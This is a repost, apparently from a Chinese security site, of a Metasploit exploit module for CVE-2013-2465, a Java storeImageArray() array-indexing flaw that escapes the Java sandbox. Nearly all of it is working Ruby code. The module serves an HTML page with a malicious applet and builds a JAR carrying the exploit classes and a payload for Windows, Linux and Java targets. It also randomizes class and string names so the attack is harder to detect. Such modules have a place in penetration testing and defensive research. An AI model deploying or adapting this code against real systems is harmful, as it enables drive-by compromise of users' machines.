Java storeImageArray() Invalid Array Indexing Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Java storeImageArray() Invalid Array Indexing Vulnerability

来源：metasploit.com 作者：sinn3r 发布时间：2013-08-19

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

# http://metasploit.com/

##

require 'msf/core'

require 'rex'

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({ :javascript => false })

def initialize( info = {} )

super( update_info( info,

'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',

'Description' => %q{

This module abuses an Invalid Array Indexing Vulnerability on the

static function storeImageArray() function in order to produce a

memory corruption and finally escape the Java Sandbox. The vulnerability

affects Java version 7u21 and earlier. The module, which doesn't bypass

click2play, has been tested successfully on Java 7u21 on Windows and

Linux systems.

},

'License' => MSF_LICENSE,

'Author' =>

[

'Unknown', # From PacketStorm

'sinn3r', # Metasploit

'juan vazquez' # Metasploit

],

'References' =>

[

[ 'CVE', '2013-2465' ],

[ 'OSVDB', '96269' ],

[ 'EDB', '27526' ],

[ 'URL', 'http://packetstormsecurity.com/files/122777/' ],

[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]

],

'Platform' => [ 'java', 'win', 'linux' ],

'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

'Targets' =>

[

[ 'Generic (Java Payload)',

{

'Arch' => ARCH_JAVA,

'Platform' => 'java'

}

],

[ 'Windows Universal',

{

'Arch' => ARCH_X86,

'Platform' => 'win'

}

],

[ 'Linux x86',

{

'Arch' => ARCH_X86,

'Platform' => 'linux'

}

]

],

'DefaultTarget' => 0,

'DisclosureDate' => 'Aug 12 2013'

))

end

def setup

path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit.class")

@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")

@color_model_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")

@color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

@exploit_class_name = rand_text_alpha("Exploit".length)

@color_model_class_name = rand_text_alpha("MyColorModel".length)

@color_space_class_name = rand_text_alpha("MyColorSpace".length)

@exploit_class.gsub!("Exploit", @exploit_class_name)

@exploit_class.gsub!("MyColorModel", @color_model_class_name)

@exploit_class.gsub!("MyColorSpace", @color_space_class_name)

@color_model_class.gsub!("Exploit", @exploit_class_name)

@color_model_class.gsub!("MyColorModel", @color_model_class_name)

@color_model_class.gsub!("MyColorSpace", @color_space_class_name)

@color_space_class.gsub!("Exploit", @exploit_class_name)

@color_space_class.gsub!("MyColorModel", @color_model_class_name)

@color_space_class.gsub!("MyColorSpace", @color_space_class_name)

super

end

def on_request_uri( cli, request )

print_debug("Requesting: #{request.uri}")

if request.uri !~ /\.jar$/i

if not request.uri =~ /\/$/

print_status("Sending redirect...")

send_redirect(cli, "#{get_resource}/", '')

return

end

print_status("Sending HTML...")

send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})

return

end

print_status("Sending .jar file...")

send_response(cli, generate_jar(cli), {'Content-Type'=>'application/java-archive'})

handler( cli )

end

def generate_html

jar_name = rand_text_alpha(5+rand(3))

html = %Q|<html>

<head>

</head>

<body>

<applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">

</applet>

</body>

</html>

|

html = html.gsub(/^\t\t/, '')

return html

end

def generate_jar(cli)

p = regenerate_payload(cli)

jar = p.encoded_jar

jar.add_file("#{@exploit_class_name}.class", @exploit_class)

jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)

jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)

metasploit_str = rand_text_alpha("metasploit".length)

payload_str = rand_text_alpha("payload".length)

jar.entries.each { |entry|

entry.name.gsub!("metasploit", metasploit_str)

entry.name.gsub!("Payload", payload_str)

entry.data = entry.data.gsub("metasploit", metasploit_str)

entry.data = entry.data.gsub("Payload", payload_str)

}

jar.build_manifest

return jar.pack

end

[